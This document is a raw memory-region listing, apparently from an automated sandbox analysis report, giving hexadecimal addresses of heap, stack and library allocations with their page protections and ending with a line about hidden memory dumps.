21D7D740000
trusted library allocation
page read and write
1CC99D7F000
heap
page read and write
7FFC9FBE0000
trusted library allocation
page read and write
21D65A02000
trusted library allocation
page read and write
1CC99E08000
heap
page read and write
1CC99E25000
heap
page read and write
17FB94D1000
heap
page read and write
21D66038000
trusted library allocation
page read and write
17FB9554000
heap
page read and write
21D65FC4000
trusted library allocation
page read and write
21D7D510000
trusted library allocation
page read and write
7FFC9F860000
trusted library allocation
page read and write
21D64F40000
trusted library allocation
page read and write
1CC9992C000
heap
page read and write
1CC9996B000
heap
page read and write
1CC99DB4000
heap
page read and write
1CC99D1D000
heap
page read and write
17FB950E000
heap
page read and write
17FB90DC000
heap
page read and write
1CC99D49000
heap
page read and write
21D7D820000
trusted library allocation
page read and write
21D7D004000
heap
page read and write
21D7D079000
heap
page read and write
21D7DA20000
trusted library allocation
page read and write
21D65C9C000
trusted library allocation
page read and write
21D7D06F000
heap
page read and write
21D7CFAD000
heap
page read and write
17FB7399000
heap
page read and write
21D64F51000
trusted library allocation
page read and write
21D7DA73000
trusted library allocation
page read and write
17FB90CD000
heap
page read and write
17FB93F6000
heap
page read and write
21D7D4D0000
trusted library allocation
page read and write
21D7D8A0000
trusted library allocation
page read and write
1CC99AA5000
heap
page read and write
1CC99C05000
heap
page read and write
7FFC9F85D000
trusted library allocation
page execute and read and write
1CC99F11000
heap
page read and write
21D7D700000
trusted library allocation
page read and write
1CC99AB1000
heap
page read and write
1CC97A40000
heap
page read and write
17FB90B0000
heap
page read and write
17FB9406000
heap
page read and write
21D7D910000
trusted library allocation
page read and write
1CC99AC1000
heap
page read and write
1CC97D3B000
heap
page read and write
17FB90D0000
heap
page read and write
21D66A34000
trusted library allocation
page read and write
17FB9554000
heap
page read and write
17FB93D2000
heap
page read and write
1CC99C29000
heap
page read and write
1CC99D87000
heap
page read and write
1CC99AAA000
heap
page read and write
17FB916D000
heap
page read and write
17FB9523000
heap
page read and write
1CC99D47000
heap
page read and write
17FB9554000
heap
page read and write
1CC99D51000
heap
page read and write
21D64F40000
trusted library allocation
page read and write
1CC99D6E000
heap
page read and write
21D65B40000
trusted library allocation
page read and write
1CC99D52000
heap
page read and write
17FB93CB000
heap
page read and write
7FFC9F910000
trusted library allocation
page execute and read and write
1CC99ABC000
heap
page read and write
17FB90D9000
heap
page read and write
7FFC9FA90000
trusted library allocation
page read and write
1CC99E05000
heap
page read and write
17FB95C5000
heap
page read and write
21D7D560000
trusted library allocation
page read and write
17FB943B000
heap
page read and write
1CC99C3E000
heap
page read and write
21D7CFC5000
heap
page read and write
21D65FF2000
trusted library allocation
page read and write
7FFC9FB60000
trusted library allocation
page read and write
7FFC9FAC0000
trusted library allocation
page read and write
21D7D830000
trusted library allocation
page read and write
1CC99C14000
heap
page read and write
21D7DA50000
trusted library allocation
page read and write
1CC99DB4000
heap
page read and write
17FB9526000
heap
page read and write
1CC99D11000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
17FB93F6000
heap
page read and write
21D7D7D0000
trusted library allocation
page read and write
1CC9992D000
heap
page read and write
32E047E000
stack
page read and write
1CC9997C000
heap
page read and write
1CC99903000
heap
page read and write
21D7D800000
trusted library allocation
page read and write
17FB9100000
heap
page read and write
17FB9564000
heap
page read and write
B7D89FE000
stack
page read and write
17FB72E5000
heap
page read and write
1CC99D39000
heap
page read and write
17FB94B0000
heap
page read and write
21D66026000
trusted library allocation
page read and write
17FB916A000
heap
page read and write
1CC99D39000
heap
page read and write
1CC99D62000
heap
page read and write
21D65C8A000
trusted library allocation
page read and write
21D65C78000
trusted library allocation
page read and write
21D66054000
trusted library allocation
page read and write
21D630CB000
heap
page read and write
17FB74EC000
heap
page read and write
17FB9519000
heap
page read and write
17FB9417000
heap
page read and write
21D64F30000
trusted library allocation
page read and write
17FB9117000
heap
page read and write
21D65C67000
trusted library allocation
page read and write
32E06FE000
stack
page read and write
32E0ABE000
stack
page read and write
21D7D09C000
heap
page read and write
1CC99DA8000
heap
page read and write
21D7D257000
heap
page read and write
17FB73B4000
heap
page read and write
21D7D099000
heap
page read and write
21D64ED4000
trusted library allocation
page read and write
17FB94F0000
heap
page read and write
17FB90F5000
heap
page read and write
21D6308B000
heap
page read and write
1CC99B10000
heap
page read and write
17FB7250000
heap
page read and write
17FB94BB000
heap
page read and write
17FB9555000
heap
page read and write
21D65AA9000
trusted library allocation
page read and write
17FB93F1000
heap
page read and write
17FB90FC000
heap
page read and write
21D7D840000
trusted library allocation
page read and write
21D65CC0000
trusted library allocation
page read and write
21D7D850000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
7FFC9FAA0000
trusted library allocation
page read and write
21D7D890000
trusted library allocation
page read and write
21D7D9D0000
trusted library allocation
page read and write
1CC99D79000
heap
page read and write
17FB9796000
heap
page read and write
21D66C94000
trusted library allocation
page read and write
1CC999ED000
heap
page read and write
21D7D4E0000
trusted library allocation
page read and write
17FB9561000
heap
page read and write
1CC97B9A000
heap
page read and write
21D7CFBA000
heap
page read and write
21D64F80000
trusted library allocation
page read and write
17FB924C000
heap
page read and write
21D64F60000
trusted library allocation
page read and write
21D64F00000
heap
page execute and read and write
1CC9990D000
heap
page read and write
17FB93F6000
heap
page read and write
1CC99D4C000
heap
page read and write
17FB73B0000
heap
page read and write
17FB9501000
heap
page read and write
21D65A6A000
trusted library allocation
page read and write
32E077E000
stack
page read and write
17FB93D4000
heap
page read and write
17FB93AA000
heap
page read and write
1CC99979000
heap
page read and write
21D7D06D000
heap
page read and write
1CC99DB0000
heap
page read and write
21D7DA70000
trusted library allocation
page read and write
1CC99ABE000
heap
page read and write
17FB9501000
heap
page read and write
1CC99D87000
heap
page read and write
17FB9554000
heap
page read and write
7FFC9FA60000
trusted library allocation
page read and write
21D65C3F000
trusted library allocation
page read and write
2F2AFE000
stack
page read and write
17FB73B4000
heap
page read and write
2F29FE000
stack
page read and write
21D7D9F9000
trusted library allocation
page read and write
17FB9158000
heap
page read and write
21D7D256000
heap
page read and write
21D7D9B0000
trusted library allocation
page read and write
1CC99C0E000
heap
page read and write
21D7D790000
trusted library allocation
page read and write
21D65AC7000
trusted library allocation
page read and write
21D64EE0000
trusted library allocation
page read and write
21D64F30000
trusted library allocation
page read and write
32E067F000
stack
page read and write
1CC99A00000
heap
page read and write
17FB94B6000
heap
page read and write
17FB93ED000
heap
page read and write
21D66AA1000
trusted library allocation
page read and write
17FB93F7000
heap
page read and write
21D64F80000
trusted library allocation
page read and write
7FFC9FAF0000
trusted library allocation
page read and write
17FB73B5000
heap
page read and write
7FFC9FA20000
trusted library allocation
page execute and read and write
7FFC9F870000
trusted library allocation
page read and write
32E180F000
stack
page read and write
21D7514A000
trusted library allocation
page read and write
1CC99D6E000
heap
page read and write
1CC99AA1000
heap
page read and write
1CC99D1B000
heap
page read and write
1CC99951000
heap
page read and write
17FB73B1000
heap
page read and write
B7D86FF000
stack
page read and write
1CC99A9E000
heap
page read and write
21D62F60000
heap
page read and write
1CC99C05000
heap
page read and write
17FB94B6000
heap
page read and write
21D64A65000
heap
page read and write
1CC99907000
heap
page read and write
17FB93DE000
heap
page read and write
21D63110000
trusted library allocation
page read and write
1CC9996B000
heap
page read and write
1CC99AA7000
heap
page read and write
21D7D7A0000
trusted library allocation
page read and write
21D7D035000
heap
page read and write
17FB9550000
heap
page read and write
1CC97D3E000
heap
page read and write
1CC99983000
heap
page read and write
21D66C70000
trusted library allocation
page read and write
21D63089000
heap
page read and write
1CC97AE7000
heap
page read and write
17FB90E9000
heap
page read and write
32E05FD000
stack
page read and write
17FB71E0000
heap
page read and write
21D7D8B0000
trusted library allocation
page read and write
21D64F20000
heap
page execute and read and write
21D65D09000
trusted library allocation
page read and write
21D65D29000
trusted library allocation
page read and write
17FB914D000
heap
page read and write
21D7D960000
trusted library allocation
page read and write
7FFC9FB70000
trusted library allocation
page read and write
21D65D35000
trusted library allocation
page read and write
1CC99D1B000
heap
page read and write
17FB93E8000
heap
page read and write
1CC99D4B000
heap
page read and write
1CC97D38000
heap
page read and write
17FB9501000
heap
page read and write
17FB73B0000
heap
page read and write
1CC99D37000
heap
page read and write
1CC99B11000
heap
page read and write
17FB9117000
heap
page read and write
7FFC9FB40000
trusted library allocation
page read and write
1CC97BBB000
heap
page read and write
1CC99E55000
heap
page read and write
1CC99D4F000
heap
page read and write
17FB73AF000
heap
page read and write
17FB73B0000
heap
page read and write
21D64A60000
heap
page read and write
17FB9554000
heap
page read and write
32E04BF000
stack
page read and write
21D7D4C0000
trusted library allocation
page read and write
7FFC9FB80000
trusted library allocation
page read and write
17FB93C2000
heap
page read and write
21D7D6E0000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
21D66A75000
trusted library allocation
page read and write
7FFC9FAD0000
trusted library allocation
page read and write
17FB94DD000
heap
page read and write
17FB9131000
heap
page read and write
21D7D095000
heap
page read and write
17FB9279000
heap
page read and write
21D7DA0F000
trusted library allocation
page read and write
1CC99901000
heap
page read and write
1CC99D10000
heap
page read and write
7FFC9FB20000
trusted library allocation
page read and write
21D64A47000
heap
page execute and read and write
17FB72E9000
heap
page read and write
17FB9100000
heap
page read and write
7FFC9FA50000
trusted library allocation
page read and write
17FB9558000
heap
page read and write
21D7D4F0000
trusted library allocation
page read and write
17FB912D000
heap
page read and write
21D7D4D0000
trusted library allocation
page read and write
17FB94F5000
heap
page read and write
7FFC9F850000
trusted library allocation
page read and write
17FB9541000
heap
page read and write
21D7D6C0000
trusted library allocation
page read and write
7FFC9F90C000
trusted library allocation
page execute and read and write
1CC99D13000
heap
page read and write
17FB9110000
heap
page read and write
21D7D530000
trusted library allocation
page read and write
17FB74EA000
heap
page read and write
17FB93C2000
heap
page read and write
1CC99945000
heap
page read and write
7FFC9FA0C000
trusted library allocation
page read and write
1CC99956000
heap
page read and write
1CC99D94000
heap
page read and write
17FB9583000
heap
page read and write
17FB90C5000
heap
page read and write
32E057E000
stack
page read and write
1CC99960000
heap
page read and write
7FFC9FA85000
trusted library allocation
page read and write
1CC99DC4000
heap
page read and write
21D7D780000
trusted library allocation
page read and write
1CC99C3D000
heap
page read and write
17FB90BC000
heap
page read and write
21D7D7E0000
trusted library allocation
page read and write
7FFC9F900000
trusted library allocation
page read and write
17FB93F1000
heap
page read and write
1CC99956000
heap
page read and write
21D7D810000
trusted library allocation
page read and write
1CC99979000
heap
page read and write
17FB72C0000
heap
page read and write
21D65A59000
trusted library allocation
page read and write
21D7D8F0000
trusted library allocation
page read and write
1CC99952000
heap
page read and write
17FB73B9000
heap
page read and write
32E0BBB000
stack
page read and write
21D64F31000
trusted library allocation
page read and write
21D65DB7000
trusted library allocation
page read and write
2F2FFE000
stack
page read and write
21D7D1A0000
heap
page read and write
17FB90DC000
heap
page read and write
17FB95A8000
heap
page read and write
21D7D9E0000
trusted library allocation
page read and write
17FB9500000
heap
page read and write
17FB90B1000
heap
page read and write
21D66B29000
trusted library allocation
page read and write
17FB90E9000
heap
page read and write
17FB96B1000
heap
page read and write
21D63043000
heap
page read and write
17FB93E8000
heap
page read and write
21D63180000
trusted library allocation
page read and write
17FB72FD000
heap
page read and write
17FB91B1000
heap
page read and write
21D6304D000
heap
page read and write
21D64F54000
trusted library allocation
page read and write
21D65C57000
trusted library allocation
page read and write
21D64F30000
trusted library allocation
page read and write
1CC99D61000
heap
page read and write
17FB94D8000
heap
page read and write
21D63040000
heap
page read and write
1CC99DB4000
heap
page read and write
21D62FD0000
trusted library allocation
page read and write
17FB929D000
heap
page read and write
2F32FB000
stack
page read and write
21D64F50000
trusted library allocation
page read and write
21D63000000
heap
page read and write
17FB9109000
heap
page read and write
21D7D500000
trusted library allocation
page read and write
17FB90C1000
heap
page read and write
17FB9135000
heap
page read and write
21D64ED0000
trusted library allocation
page read and write
21D7D9A0000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
1CC99D3C000
heap
page read and write
17FB94DB000
heap
page read and write
17FB957C000
heap
page read and write
21D65FE1000
trusted library allocation
page read and write
1CC99D88000
heap
page read and write
17FB94DC000
heap
page read and write
17FB72E8000
heap
page read and write
17FB9526000
heap
page read and write
17FB943A000
heap
page read and write
21D64F32000
trusted library allocation
page read and write
21D7D08F000
heap
page read and write
21D65C25000
trusted library allocation
page read and write
21D7DA40000
trusted library allocation
page read and write
17FB94C3000
heap
page read and write
21D64F40000
trusted library allocation
page read and write
17FB72CE000
heap
page read and write
17FB95A5000
heap
page read and write
1CC99D36000
heap
page read and write
17FB9554000
heap
page read and write
21D65B5A000
trusted library allocation
page read and write
17FB94DD000
heap
page read and write
7FFC9FB90000
trusted library allocation
page read and write
17FB9555000
heap
page read and write
17FB910C000
heap
page read and write
21D64F90000
heap
page read and write
21D64A40000
heap
page execute and read and write
1CC99AB1000
heap
page read and write
21D7D920000
trusted library allocation
page read and write
17FB9629000
heap
page read and write
7FFC9F854000
trusted library allocation
page read and write
21D65AD6000
trusted library allocation
page read and write
1CC99D62000
heap
page read and write
21D7D6F0000
trusted library allocation
page read and write
1CC99D16000
heap
page read and write
17FB927E000
heap
page read and write
17FB73B4000
heap
page read and write
7FFC9FBA0000
trusted library allocation
page read and write
1CC99914000
heap
page read and write
7FFC9FBC0000
trusted library allocation
page read and write
1CC99ACF000
heap
page read and write
21D65B14000
trusted library allocation
page read and write
17FB914C000
heap
page read and write
21D65FD0000
trusted library allocation
page read and write
1CC99AB5000
heap
page read and write
17FB9195000
heap
page read and write
21D7D074000
heap
page read and write
17FB93DE000
heap
page read and write
17FB915A000
heap
page read and write
21D7D990000
trusted library allocation
page read and write
1CC999F0000
heap
page read and write
17FB93F5000
heap
page read and write
B7D8BFB000
stack
page read and write
1CC99DB4000
heap
page read and write
1CC9991D000
heap
page read and write
21D62FF0000
trusted library allocation
page read and write
21D66C7F000
trusted library allocation
page read and write
17FB73AC000
heap
page read and write
1CC97D39000
heap
page read and write
1CC999B1000
heap
page read and write
1CC99979000
heap
page read and write
17FB910F000
heap
page read and write
17FB90CD000
heap
page read and write
21D7D4A0000
heap
page read and write
21D7D880000
trusted library allocation
page read and write
17FB9274000
heap
page read and write
7FFC9FAE7000
trusted library allocation
page read and write
1CC99929000
heap
page read and write
21D7DA1D000
trusted library allocation
page read and write
21D659E1000
trusted library allocation
page read and write
21D64F30000
trusted library allocation
page read and write
21D65CD2000
trusted library allocation
page read and write
17FB917D000
heap
page read and write
21D7D24F000
heap
page read and write
21D7D760000
trusted library allocation
page read and write
17FB957C000
heap
page read and write
1CC97C90000
heap
page read and write
17FB950E000
heap
page read and write
21D64F53000
trusted library allocation
page read and write
1CC999A8000
heap
page read and write
21D7D9F4000
trusted library allocation
page read and write
21D62F40000
heap
page read and write
1CC99DC1000
heap
page read and write
17FB74EA000
heap
page read and write
21D65CF7000
trusted library allocation
page read and write
1CC99D1B000
heap
page read and write
17FB9569000
heap
page read and write
1CC9997A000
heap
page read and write
1CC97D30000
heap
page read and write
21D64F00000
trusted library allocation
page read and write
17FB9554000
heap
page read and write
1CC99C0E000
heap
page read and write
7FFC9F936000
trusted library allocation
page execute and read and write
17FB92A9000
heap
page read and write
21D7D930000
trusted library allocation
page read and write
17FB941A000
heap
page read and write
1CC99D3B000
heap
page read and write
2F30FF000
stack
page read and write
21D7D0A0000
heap
page read and write
1CC99C29000
heap
page read and write
1CC99D3D000
heap
page read and write
1CC99A9F000
heap
page read and write
21D7D7B0000
trusted library allocation
page read and write
21D7D082000
heap
page read and write
21D64EE0000
trusted library allocation
page read and write
21D65A87000
trusted library allocation
page read and write
7FFC9F8AC000
trusted library allocation
page execute and read and write
17FB918E000
heap
page read and write
17FB73AD000
heap
page read and write
21D7D570000
heap
page read and write
21D7D710000
trusted library allocation
page read and write
1CC99C03000
heap
page read and write
17FB90B3000
heap
page read and write
17FB924E000
heap
page read and write
7FFC9FBD0000
trusted library allocation
page read and write
21D7D075000
heap
page read and write
17FB92AE000
heap
page read and write
1CC99AC8000
heap
page read and write
1CC97AEA000
heap
page read and write
1CC97AC0000
heap
page read and write
17FB917D000
heap
page read and write
7FFC9FB30000
trusted library allocation
page read and write
21D64F60000
trusted library allocation
page read and write
17FB9539000
heap
page read and write
17FB911E000
heap
page read and write
1CC99A9C000
heap
page read and write
21D63063000
heap
page read and write
17FB73BE000
heap
page read and write
17FB94C0000
heap
page read and write
17FB73AD000
heap
page read and write
21D7DA18000
trusted library allocation
page read and write
17FB94FB000
heap
page read and write
17FB93ED000
heap
page read and write
17FB9540000
heap
page read and write
1CC99949000
heap
page read and write
17FB9529000
heap
page read and write
1CC99C40000
heap
page read and write
21D66C87000
trusted library allocation
page read and write
17FB9583000
heap
page read and write
21D64FFE000
trusted library allocation
page read and write
1CC99939000
heap
page read and write
17FB916D000
heap
page read and write
17FB9161000
heap
page read and write
1CC99DB3000
heap
page read and write
1CC999A5000
heap
page read and write
17FB90B4000
heap
page read and write
1CC99979000
heap
page read and write
There are 828 hidden memdumps, click here to show them.